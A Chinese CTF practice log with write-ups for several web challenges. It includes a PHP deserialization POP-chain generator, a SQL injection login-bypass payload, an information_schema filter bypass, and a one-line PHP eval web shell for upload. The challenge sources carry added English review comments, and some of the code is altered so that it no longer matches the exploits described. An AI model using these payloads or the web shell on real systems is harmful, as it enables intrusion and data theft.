2019bytectfs刷题记录

EZCMS

www.zip出源码

function login(){
    // Issues the "hash" cookie, computed as md5(secret . "adminadmin"), and
    // always reports success (1).
    // NOTE(review): md5(secret . data) is not a keyed MAC; hash_hmac() for
    // issuing and hash_equals() for checking is the robust construction.
    $secret = "********";
    $digest = md5($secret . "adminadmin");
    setcookie("hash", $digest);
    return 1;
}

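function is_admin(){
    // Returns 1 only when the session names user "admin" with a password other
    // than the literal "admin" AND the "user" cookie equals
    // md5(secret . username . password); otherwise 0. Return contract (1/0) is unchanged.
    $secret = "********";
    $username = $_SESSION['username'] ?? null;
    $password = $_SESSION['password'] ?? null;
    // Strict comparisons: the original used `==`/`!=`, which let non-string
    // session values (e.g. true) compare loosely equal to "admin".
    if ($username !== "admin" || $password === "admin") {
        return 0;
    }
    $presented = $_COOKIE['user'] ?? null;
    if (!is_string($presented)) {
        return 0;
    }
    // NOTE(review): md5(secret . data) is not a keyed MAC; hash_hmac() over the
    // same fields would be the sound design. Kept as-is so existing cookies
    // still validate. hash_equals() avoids early-exit timing on mismatch.
    $expected = md5($secret . $username . $password);
    return hash_equals($expected, $presented) ? 1 : 0;
}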


CISCN2019

Laravel1

一道MVC架构的php反序列化题,以前遇到这样的题,因为代码太多,不知道怎么看,无从下手233
这里记录一下方法吧
1、首先全局搜索__destruct这样的魔术方法
2、看看本类中有没有可控的命令执行命令,如果没有就找有没有那个方法可以调用其他类
3、然后全局搜索能利用的可控函数
wp
include包含文件的链子
TagAwareAdapter::destruct()->commit()->invalidateTags()->PhpArrayAdapter::saveDeferred()->PhpArrayTrait::initialize()

<?php
namespace Symfony\Component\Cache\Adapter;
class PhpArrayAdapter
{
    // Stand-in for the Symfony class of the same name: only the private
    // `file` property is needed for the serialized form shown in this writeup.
    // A property default yields the same serialized bytes as assigning it in
    // a constructor. The general defence against this whole class of chain is
    // never calling unserialize() on request-controlled data.
    private $file = '/flag';
}
namespace Symfony\Component\Cache;
final class CacheItem{
    // Empty stand-in: only the class name appears in the serialized form,
    // so no properties are declared.
}
namespace Symfony\Component\Cache\Adapter;
use Symfony\Component\Cache\CacheItem;
class TagAwareAdapter
{
    // Mirrors the two private properties the chain listed in the writeup walks
    // from __destruct(): one deferred CacheItem and the PhpArrayAdapter pool.
    // Declaration order is kept (deferred before pool) so the serialized
    // output is unchanged.
    private $deferred;
    private $pool;

    public function __construct()
    {
        $this->deferred = [new CacheItem()];
        $this->pool = new PhpArrayAdapter();
    }
}
// Print the URL-encoded serialized object graph built above.
$chain = new TagAwareAdapter();
echo urlencode(serialize($chain));


2020HGAME

在家堕落了好多天,今天去做了下Hgame的week3


CISCN2019

Dropbox

先注册一个账号,登陆之后上传一个正常的图片,在测试下载功能的时候发现有任意文件下载
class.php

// Challenge bootstrap: silence runtime notices and open the shared DB handle
// that User::__construct() picks up via `global $db`.
// NOTE(review): credentials are hard-coded in source; outside a CTF they
// belong in configuration kept out of the web root.
error_reporting(0);
[$dbaddr, $dbuser, $dbpass, $dbname] = ["127.0.0.1", "root", "root", "dropbox"];
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

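class User {
    public $db;

    // Picks up the connection opened at file scope (`global $db`); no
    // connection is opened here.
    public function __construct() {
        global $db;
        $this->db = $db;
    }

    // True when a row with exactly this username exists. Uses a prepared
    // statement with the name bound as a string; the statement is closed
    // before returning so the handle is not held until script end.
    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $found = $stmt->num_rows > 0;
        $stmt->close();
        return $found;
    }

    // Inserts a new user; returns false without writing when the name is taken.
    // NOTE(review): sha1(password . fixed string) is a fast digest with one
    // shared salt; password_hash()/password_verify() is the proper primitive.
    // Kept because stored rows depend on this exact format.
    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        $stmt->close();
        return true;
    }

    // True when the stored digest equals sha1(password . fixed string).
    // hash_equals() replaces `===` so the comparison does not exit early on
    // the first differing byte; the boolean contract is unchanged.
    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        $stmt->close();
        return is_string($expect) && hash_equals($expect, $password);
    }

    // Only close a real mysqli handle. `$db` is a public property, so a User
    // rebuilt by unserialize() could carry any object here; calling ->close()
    // on it blindly would invoke that object's close() (File::close() in this
    // file reads a file) or fatal on null.
    public function __destruct() {
        if ($this->db instanceof mysqli) {
            $this->db->close();
        }
    }
}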

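class FileList {
    private $files;
    private $results;
    private $funcs;

    // Wraps every directory entry of $path (except "." and "..") in a File.
    // $path is concatenated with each entry as-is, so callers must supply a
    // trailing slash.
    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        // scandir() returns false on a missing/unreadable path; treat that as
        // an empty listing instead of iterating over false.
        $filenames = scandir($path);
        if ($filenames === false) {
            return;
        }
        // Drop "." and ".." by value. The original used array_search()+unset,
        // which — when an entry is absent — returns false, and unset($a[false])
        // silently removes index 0.
        $filenames = array_diff($filenames, array(".", ".."));

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    // Any undefined method called on the list is recorded and fanned out to
    // every File; $args is not forwarded (as in the original). Only methods
    // the target actually defines are invoked, so an unknown name no longer
    // fatals part-way through the loop.
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            if (!method_exists($file, $func)) {
                continue;
            }
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    // Renders the collected results as table rows on destruction. $table is
    // initialised explicitly — the original appended to an undefined variable,
    // which error_reporting(0) masked. Values are cast to string before
    // htmlentities() so a non-string result cannot raise a TypeError.
    public function __destruct() {
        $table = '';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities((string) $value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">涓嬭浇</a> / <a href="#" class="delete">鍒犻櫎</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}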

class File {
    public $filename;

    // Records the path and reports whether it names an existing entry that is
    // not a directory. The path is stored even when the check fails.
    public function open($filename) {
        $this->filename = $filename;
        if (!file_exists($filename)) {
            return false;
        }
        return !is_dir($filename);
    }

    // Last path component of the stored filename.
    public function name() {
        return basename($this->filename);
    }

    // Human-readable size: divide by 1024 while the value is >= 1024 (at most
    // four times), round to two decimals and append the matching unit.
    public function size() {
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        $bytes = filesize($this->filename);
        $step = 0;
        while ($bytes >= 1024 && $step < 4) {
            $bytes /= 1024;
            $step++;
        }
        return round($bytes, 2) . $units[$step];
    }

    // Deletes the file from disk (method name kept exactly as in the original).
    public function detele() {
        unlink($this->filename);
    }

    // Despite the name, nothing is closed: this reads and returns the whole
    // file's contents. Worth remembering when auditing what a close() call on
    // an arbitrary object can do.
    public function close() {
        return file_get_contents($this->filename);
    }
}


php无参数命令执行

gxy禁止套娃

之前没来得及看这道题,现在来buu复现一下
打开没看到什么提示,想着扫一下目录,但是扫buu直接429了,直接看wp去了
git泄露出index.php

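<?php
// Challenge entry point: pulls the flag into scope, then eval()s $_GET['exp']
// once it passes three regex gates.
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    $exp = $_GET['exp'];
    // Gate 1: reject stream-wrapper prefixes.
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $exp)) {
        // Gate 2: after stripping nested `name(...)` calls, only ";" may remain.
        if(';' === preg_replace('/[a-z|\-]+\((?R)?\)/', NULL, $exp)) {
            // Gate 3: substring denylist. The original tested an undefined
            // variable ($code) here, so this gate never rejected anything;
            // it now inspects the same input as the other two gates.
            if (!preg_match('/et|na|nt|info|dec|bin|hex|oct|pi|log/i', $exp)) {
                // NOTE(review): eval() of request data remains — the gates are a
                // denylist, not a sandbox. That is the challenge's design.
                eval($exp);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);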


极客大挑战刷题记录

EasySQL

一个登陆框,f12没看到什么特殊的东西,admin 123456 登陆一下,提示username or password错误
简单测试username处存在注入,直接万能密码?username=admin’ or 1%23&password=12345 登陆成功


swpu刷题记录

https://nikoeurus.github.io/2019/12/09/SWPU-ctf/#%E5%87%BA%E9%A2%98%E4%BA%BA%E4%B8%8D%E7%9F%A5%E9%81%93


swpu刷题记录

WEB1

进去一看一个登陆框。注册个账号登陆后,有个发布广告的功能,发布之后查看,怀疑存在二次注入
试了一下发现存在二次注入,注入点在标题处,过滤了order by,用group by判断出有22列
回显位置是 2,3,库名web1,但是查表名的时候过滤了information_schema 凉凉
看wp学新操作聊一聊bypass information_schema
MySQL5.7的新特性
由于performance_schema过于复杂,所以mysql在5.7版本中新增了sys schema,基础数据来自于performance_schema和information_schema
两个库,本身数据库不存储数据。
注:利用InnoDB引擎绕过对information_schema的过滤,但是mysql默认是关闭InnoDB存储引擎的
sys.schema_auto_increment_columns表


SUCTF刷题记录

[SUCTF 2019]CheckIn

一看这道题和之前gxy那道上传很类似,加GIF89A文件头可以上传.htaccess文件

<script language="pHp">@eval($_POST['a'])</script>


记一些自己的憨批做题经历

持续更新,记录自己的憨批时刻
